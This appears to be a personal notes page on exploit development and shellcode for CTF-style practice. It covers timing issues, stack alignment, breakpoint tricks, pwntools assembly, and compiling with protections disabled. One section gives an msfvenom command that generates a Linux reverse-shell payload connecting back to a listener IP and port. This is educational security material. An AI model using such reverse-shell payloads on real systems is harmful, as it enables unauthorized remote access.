# Shellcode

## Common Problems

### Don’t Send Data Too Fast

Take into account that sending data too fast might lead to unexpected results, especially in applications that were designed for slow humans.

For example, I couldn’t get a segfault to occur in [Fusion 2](https://exploit.education/fusion/level02/). After I added 1 second sleeps between all the network traffic I sent, it started working 100% of the time.

### **Stack Alignment**

{% embed url="<https://githubmemory.com/repo/Gallopsled/pwntools/issues/1870>" %}
Reference to the problem
{% endembed %}

You might be required to align the stack to 8 or 16 bytes when doing ROP chains. If your exploit is working locally but not remotely, then this is one possible cause.

## Testing out shellcode <a href="#docs-internal-guid-93dd9c71-7fff-548c-e6c6-1998f3822515" id="docs-internal-guid-93dd9c71-7fff-548c-e6c6-1998f3822515"></a>

### **Breakpoint trick**

If you’re not sure if your shellcode is being hit (for example in a regular execution environment without a debugger), then you can place a `0xCC` instruction (INT3 breakpoint). When that breakpoint is hit, then you will get a message indicating that (Trace/breakpoint trap).

Though, it won't end up in dmesg. If you want it to end up in dmesg, then you can use something that causes a segfault, like `pwn.asm(pwn.shellcraft.i386.crash())` from pwntools. You can also try `pwn.asm(pwn.shellcraft.i386.infloop())` to create an infinite loop.

### Shellcode repository <a href="#docs-internal-guid-8bb984d0-7fff-0c2e-6b7a-d70e39195326" id="docs-internal-guid-8bb984d0-7fff-0c2e-6b7a-d70e39195326"></a>

{% embed url="<http://shell-storm.org/shellcode/>" %}

But really, using **msfvenom** to generate your own shellcode is better in pretty much every way.

#### **Test files**

There are usually test files along with shellcode. You might need to supply additional options for gcc, like making the stack executable, etc.

```
gcc test.c -o test -fno-stack-protector -z execstack -no-pie
```

## Generating Shellcode <a href="#docs-internal-guid-4e2e7295-7fff-c1d9-0b54-88997d5797ed" id="docs-internal-guid-4e2e7295-7fff-c1d9-0b54-88997d5797ed"></a>

### **Generating shellcode with msfvenom**

You can generate shellcode for a reverse shell using msfvenom.

This is an example of an x86 linux reverse shell, which will connect back to 172.16.184.1 on port 8000. It’s set to python format, so you can paste it into python.&#x20;

```
msfvenom -p linux/x86/shell_reverse_tcp LHOST=172.16.184.1 LPORT=8000 -a x86 --platform linux -f python
```

You can also assign bytes that the shellcode must not use (like NULL bytes or backslashes). This is useful if you have certain limitations.

### **Generating Assembly Using Pwntools**

{% embed url="<https://docs.pwntools.com/en/stable/asm.html>" %}
Documentation
{% endembed %}

You can use pwntools to generate the machine code for whatever assembly you want to execute. For example, here is the syntax for doing relative jumps in pwntools on the command line:

```
pwn asm 'jmp $+0x20'
```

And this is how you can do it in Python code:

```
>>> import pwn
>>> pwn.asm('jmp $+0x20')
b'\xeb\x1e'
```